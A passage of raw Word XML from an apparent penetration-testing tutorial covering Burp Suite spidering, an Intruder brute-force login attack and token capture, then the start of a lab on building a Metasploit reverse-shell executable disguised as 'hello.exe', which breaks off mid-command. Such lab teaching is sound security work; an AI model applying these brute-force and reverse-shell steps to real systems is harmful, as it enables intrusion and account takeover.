                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3361690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FEAD82" w14:textId="77777777" w:rsidR="000A6815" w:rsidRDefault="000A6815"/>
    <w:p w14:paraId="2F7AEFB7" w14:textId="37F69BC1" w:rsidR="00BE6490" w:rsidRDefault="000A6815">
      <w:r>
        <w:t xml:space="preserve"> Again, we will go to side mapping. And here we will click on this domain. And here we will get the option of spider this host through which we can perform spidering. But as you can see, there is no such option here. Because as I told you, I am using this free version. So </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">that’s </w:t>
      </w:r>
      <w:r w:rsidR="004F7AEE">
        <w:t xml:space="preserve">why I will get only limited things here. But if you use its paid version then you will get the option of spidering there. And you will be able to map the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004F7AEE">
        <w:t>wepsite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004F7AEE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502F62E5" w14:textId="77777777" w:rsidR="004F7AEE" w:rsidRDefault="004F7AEE"/>
    <w:p w14:paraId="0891078F" w14:textId="145336A3" w:rsidR="004F7AEE" w:rsidRDefault="004F7AEE">
      <w:r w:rsidRPr="004F7AEE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5763C163" wp14:editId="406CE380">
            <wp:extent cx="5733415" cy="3367405"/>
            <wp:effectExtent l="0" t="0" r="635" b="4445"/>
            <wp:docPr id="201745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59487" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3367405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CABC229" w14:textId="77777777" w:rsidR="004F7AEE" w:rsidRDefault="004F7AEE"/>
    <w:p w14:paraId="3D4F4A38" w14:textId="5AE83F77" w:rsidR="004F7AEE" w:rsidRDefault="001E4710">
      <w:r>
        <w:t>Now if we want to perform attacks on websites, automate attacks, then we can do things for that also here. Same here we will go to request. And we will add this request to the intruder here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6633D67A" w14:textId="5F5F6ABE" w:rsidR="001E4710" w:rsidRDefault="001E4710">
      <w:r>
        <w:t>As you can see here my request has been added to intruder. This is a testing website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D192EB" w14:textId="77777777" w:rsidR="001E4710" w:rsidRDefault="001E4710"/>
    <w:p w14:paraId="2A0ACAD1" w14:textId="7CA59E2B" w:rsidR="001E4710" w:rsidRDefault="009952C9">
      <w:r w:rsidRPr="009952C9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78B1D845" wp14:editId="771E2CE4">
            <wp:extent cx="5733415" cy="3048000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="974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907" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3048000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D322A7C" w14:textId="77777777" w:rsidR="009952C9" w:rsidRDefault="009952C9"/>
    <w:p w14:paraId="64D830C1" w14:textId="5CE8D1AE" w:rsidR="009952C9" w:rsidRDefault="009952C9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">I will change its parameters here. I will write username equal to admin </w:t>
      </w:r>
      <w:r w:rsidR="008D1C36">
        <w:t>and I will click on the add option and I can add anything like password here I have added it. After I make changes in the parameters, I will get the option of payload.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D1C36">
        <w:t>Here I will click on add. Here I can add any word to the list. Like admin, test or guest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03771687" w14:textId="77777777" w:rsidR="008D1C36" w:rsidRDefault="008D1C36"/>
    <w:p w14:paraId="67B655A6" w14:textId="2DC47D01" w:rsidR="008D1C36" w:rsidRDefault="008D1C36">
      <w:r w:rsidRPr="008D1C36">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65FC502D" wp14:editId="65383F64">
            <wp:extent cx="5733415" cy="3385185"/>
            <wp:effectExtent l="0" t="0" r="635" b="5715"/>
            <wp:docPr id="20995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7412" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3385185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA83E5C" w14:textId="77777777" w:rsidR="008D1C36" w:rsidRDefault="008D1C36"/>
    <w:p w14:paraId="07125BE2" w14:textId="43081675" w:rsidR="008D1C36" w:rsidRDefault="008D1C36">
      <w:r>
        <w:t>I will add these three things to the payload which will confirm the payload. Now here I can start my attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79753697" w14:textId="77777777" w:rsidR="002B02EA" w:rsidRDefault="002B02EA"/>
    <w:p w14:paraId="6D4B1C8B" w14:textId="1217D18D" w:rsidR="002B02EA" w:rsidRDefault="002B02EA">
      <w:r w:rsidRPr="002B02EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36CED40F" wp14:editId="558CC3CC">
            <wp:extent cx="5733415" cy="3410585"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="179623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30767" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3410585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="012CCC41" w14:textId="77777777" w:rsidR="002B02EA" w:rsidRDefault="002B02EA"/>
    <w:p w14:paraId="46CA5EEA" w14:textId="3786DBE6" w:rsidR="002B02EA" w:rsidRDefault="002B02EA">
      <w:r>
        <w:t>Now click on ignore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEBC878" w14:textId="77777777" w:rsidR="002B02EA" w:rsidRDefault="002B02EA"/>
    <w:p w14:paraId="4E92583A" w14:textId="5257DD8D" w:rsidR="002B02EA" w:rsidRDefault="002B02EA">
      <w:r w:rsidRPr="002B02EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FDB4617" wp14:editId="06FEC64B">
            <wp:extent cx="5733415" cy="3417570"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="61155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51517" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3417570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5394EFA4" w14:textId="77777777" w:rsidR="002B02EA" w:rsidRDefault="002B02EA"/>
    <w:p w14:paraId="304889B0" w14:textId="77777777" w:rsidR="00514BBC" w:rsidRDefault="002B02EA">
      <w:r>
        <w:t>As you can see, my attack has started here. I have received response on this website of mine. Because this is a very basic website</w:t>
      </w:r>
      <w:r w:rsidR="00514BBC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CB3264" w14:textId="77777777" w:rsidR="00514BBC" w:rsidRDefault="00514BBC"/>
    <w:p w14:paraId="46BBF690" w14:textId="145D4599" w:rsidR="00514BBC" w:rsidRDefault="00514BBC">
      <w:r w:rsidRPr="00514BBC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5943A8FD" wp14:editId="54AA1115">
            <wp:extent cx="5733415" cy="3413760"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="9445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8915" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3413760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C7E0A6" w14:textId="77777777" w:rsidR="00514BBC" w:rsidRDefault="00514BBC"/>
    <w:p w14:paraId="1DE73C2A" w14:textId="77777777" w:rsidR="00514BBC" w:rsidRDefault="00514BBC"/>
    <w:p w14:paraId="70D26D5C" w14:textId="07D3FE26" w:rsidR="002B02EA" w:rsidRDefault="002B02EA">
      <w:r>
        <w:t>That’s why user activities are also less here. Because this entire attack is automated. So, I will discard it. I’ll close it here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544CCB62" w14:textId="77777777" w:rsidR="00514BBC" w:rsidRDefault="00514BBC"/>
    <w:p w14:paraId="2CB3C830" w14:textId="6DF5EA22" w:rsidR="000A6815" w:rsidRDefault="002B02EA">
      <w:r w:rsidRPr="002B02EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E24007B" wp14:editId="2E6AB665">
            <wp:extent cx="5733415" cy="3399790"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="36594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41717" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3399790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDDDBF9" w14:textId="77777777" w:rsidR="002B02EA" w:rsidRDefault="002B02EA"/>
    <w:p w14:paraId="7D88DA60" w14:textId="062E8ECA" w:rsidR="00514BBC" w:rsidRDefault="00514BBC">
      <w:r>
        <w:t>And using this attack you can do brood force here. And you can also completely freeze the user inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034B7EA3" w14:textId="07A0AD8F" w:rsidR="00514BBC" w:rsidRDefault="00514BBC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Now if you want to do session handling here, then there are functions for that also. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Again</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> here I will come the proxy and we will do the session handling on this domain. I will click on this and here I will send this sequence here. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3943E282" w14:textId="77777777" w:rsidR="00514BBC" w:rsidRDefault="00514BBC"/>
    <w:p w14:paraId="750B6B6A" w14:textId="46AF59FE" w:rsidR="00514BBC" w:rsidRDefault="00514BBC">
      <w:r w:rsidRPr="00514BBC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="501C493A" wp14:editId="367EF739">
            <wp:extent cx="5733415" cy="3390265"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="43940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05927" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3390265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7F7E67" w14:textId="77777777" w:rsidR="00514BBC" w:rsidRDefault="00514BBC"/>
    <w:p w14:paraId="7B4A322A" w14:textId="506609CD" w:rsidR="00514BBC" w:rsidRDefault="00514BBC">
      <w:r>
        <w:t xml:space="preserve">This file of ours has been added to the sequencer. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5A92B7" w14:textId="77777777" w:rsidR="00514BBC" w:rsidRDefault="00514BBC"/>
    <w:p w14:paraId="5C41B441" w14:textId="7FC789D9" w:rsidR="00514BBC" w:rsidRDefault="00514BBC">
      <w:r w:rsidRPr="00514BBC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25003BF3" wp14:editId="4BA4D04B">
            <wp:extent cx="5733415" cy="3419475"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="19518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0432" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3419475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="644D8F7D" w14:textId="77777777" w:rsidR="00514BBC" w:rsidRDefault="00514BBC"/>
    <w:p w14:paraId="5E224302" w14:textId="0C71B93C" w:rsidR="00514BBC" w:rsidRDefault="00514BBC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">From here you can capture live here. </w:t>
      </w:r>
      <w:r w:rsidR="0048768A">
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0048768A">
        <w:t xml:space="preserve"> you can see, I have started live capture. And all the token number of the websites are being captured here. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC02278" w14:textId="77777777" w:rsidR="002B02EA" w:rsidRDefault="002B02EA"/>
    <w:p w14:paraId="73C95F61" w14:textId="446028C8" w:rsidR="000A6815" w:rsidRDefault="00C926ED">
      <w:r w:rsidRPr="00C926ED">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="380962BD" wp14:editId="0180243B">
            <wp:extent cx="5733415" cy="3954780"/>
            <wp:effectExtent l="0" t="0" r="635" b="7620"/>
            <wp:docPr id="175074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8518" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3954780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCADD32" w14:textId="77777777" w:rsidR="00D73732" w:rsidRDefault="00D73732"/>
    <w:p w14:paraId="680DB136" w14:textId="201558C1" w:rsidR="00D73732" w:rsidRDefault="00D73732">
      <w:r w:rsidRPr="00D73732">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DFA993C" wp14:editId="4E18EFBD">
            <wp:extent cx="5733415" cy="3405505"/>
            <wp:effectExtent l="0" t="0" r="635" b="4445"/>
            <wp:docPr id="89508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2598" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3405505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDE1871" w14:textId="77777777" w:rsidR="00C926ED" w:rsidRDefault="00C926ED"/>
    <w:p w14:paraId="78D832DF" w14:textId="65CA4647" w:rsidR="00C926ED" w:rsidRDefault="00C926ED">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">What are the vulnerabilities in it? And then after time all that vulnerability all those loop holes are fixed. So, in this way you can use the </w:t>
      </w:r>
      <w:r w:rsidR="00D73732">
        <w:t>burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> suite tool here for security. And after performing all the things here on your domain, you can forward it to its server. And here you can drop this domain here. Meaning the users request will be dropped. So, you can do both the things here to end your things.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3237E38B" w14:textId="77777777" w:rsidR="00C926ED" w:rsidRDefault="00C926ED"/>
    <w:p w14:paraId="0183BBA1" w14:textId="0154BA70" w:rsidR="003E2D71" w:rsidRDefault="00C926ED">
      <w:r>
        <w:t xml:space="preserve">I will click on forward </w:t>
      </w:r>
      <w:r w:rsidR="003E2D71">
        <w:t xml:space="preserve">here and whatever changes I have performed here, whatever captures I have taken, after all that, this request will go to the server here and we will get the result of the website. I hope you have fully understood. How you can use the burp suite tool. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02141779" w14:textId="77777777" w:rsidR="00422FAD" w:rsidRDefault="00422FAD"/>
    <w:p w14:paraId="7799F157" w14:textId="77777777" w:rsidR="00422FAD" w:rsidRPr="006B196C" w:rsidRDefault="00422FAD" w:rsidP="00422FAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textOutline w14:w="9525" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
            <w14:prstDash w14:val="solid"/>
            <w14:bevel/>
          </w14:textOutline>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B196C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textOutline w14:w="9525" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
            <w14:prstDash w14:val="solid"/>
            <w14:bevel/>
          </w14:textOutline>
        </w:rPr>
        <w:t xml:space="preserve">Title: </w:t>
      </w:r>
      <w:r w:rsidRPr="006B196C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textOutline w14:w="9525" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
            <w14:prstDash w14:val="solid"/>
            <w14:bevel/>
          </w14:textOutline>
        </w:rPr>
        <w:t>Privilege Escalation and Persistence Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267C7D59" w14:textId="67CC8738" w:rsidR="00422FAD" w:rsidRDefault="00422FAD"/>
    <w:p w14:paraId="1C847DA4" w14:textId="4EC34A2C" w:rsidR="00422FAD" w:rsidRDefault="00422FAD">
      <w:r>
        <w:tab/>
        <w:t>Privilege escalation gaining higher access rights than you originally have on a system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102A499E" w14:textId="77777777" w:rsidR="00422FAD" w:rsidRDefault="00422FAD"/>
    <w:p w14:paraId="4132EC37" w14:textId="7B68224E" w:rsidR="00422FAD" w:rsidRDefault="00422FAD">
      <w:r>
        <w:tab/>
        <w:t>Persistence creating a method that allows an attacker to return to or keep control over time even after reboots or credential changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B74639" w14:textId="77777777" w:rsidR="00422FAD" w:rsidRDefault="00422FAD"/>
    <w:p w14:paraId="76BABD62" w14:textId="437A7CC5" w:rsidR="00422FAD" w:rsidRDefault="00422FAD">
      <w:r>
        <w:t>Step1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DCF83B" w14:textId="7F35311C" w:rsidR="00422FAD" w:rsidRDefault="00422FAD">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Generate a windows payloads using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E3036">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D7C1A42" w14:textId="6B71CA37" w:rsidR="00422FAD" w:rsidRDefault="00422FAD"/>
    <w:p w14:paraId="2C98C6E9" w14:textId="58D7FCA2" w:rsidR="00422FAD" w:rsidRDefault="00422FAD">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">We go deeper gaining a foothold inside the network and making sure we don’t lose it. This is where we establish persistence </w:t>
      </w:r>
      <w:r w:rsidR="00433B58">
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00433B58">
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00433B58">
        <w:t xml:space="preserve"> interpreter payload and a back door before we go further, please remember this walkthrough is for educational purpose only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39184507" w14:textId="77777777" w:rsidR="00433B58" w:rsidRDefault="00433B58"/>
    <w:p w14:paraId="39457C88" w14:textId="37E1ACAB" w:rsidR="00433B58" w:rsidRDefault="00433B58">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">All steps are demonstrated in a controlled ethical lab environment to support learning, awareness, and proactive defence department. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4B272F" w14:textId="77777777" w:rsidR="00433B58" w:rsidRDefault="00433B58"/>
    <w:p w14:paraId="1BE8BC31" w14:textId="251B1823" w:rsidR="00C40BAF" w:rsidRDefault="00433B58">
      <w:r>
        <w:tab/>
        <w:t>Let’s into phase one payload generation. We start by crafting a malicious windows executable using venom, a part of the Metasploit framework. This tool allows us to embed a reverse shell into a standalone.exe file. We configure the payload with our attack machine’s IP address and the port we’ll listening on in this case, port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264C226C" w14:textId="77777777" w:rsidR="00C40BAF" w:rsidRDefault="00C40BAF"/>
    <w:p w14:paraId="65C4C4C0" w14:textId="24115492" w:rsidR="00C40BAF" w:rsidRDefault="00C40BAF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Open the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2D87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>terminal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and start the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2D87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>apache2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C51DE5" w14:textId="77777777" w:rsidR="00C40BAF" w:rsidRDefault="00C40BAF"/>
    <w:p w14:paraId="6236EB11" w14:textId="09210D00" w:rsidR="00C40BAF" w:rsidRDefault="00C40BAF">
      <w:r w:rsidRPr="00C40BAF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53FC697A" wp14:editId="62A785B1">
            <wp:extent cx="5733415" cy="837565"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="168494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47037" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="837565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB1743B" w14:textId="77777777" w:rsidR="00C40BAF" w:rsidRDefault="00C40BAF"/>
    <w:p w14:paraId="32857E5C" w14:textId="77777777" w:rsidR="00C40BAF" w:rsidRDefault="00C40BAF"/>
    <w:p w14:paraId="1EF4ED3E" w14:textId="739CA4B8" w:rsidR="00C40BAF" w:rsidRDefault="0032758E">
      <w:r>
        <w:t>Once created, we move the pillow to our web server directory, remaining it as something harmless like hello.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC669A3" w14:textId="08201E3F" w:rsidR="00C40BAF" w:rsidRPr="008E2D87" w:rsidRDefault="00C40BAF" w:rsidP="00981FE9">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E2D87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E2D87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E2D87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E2D87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E2D87">
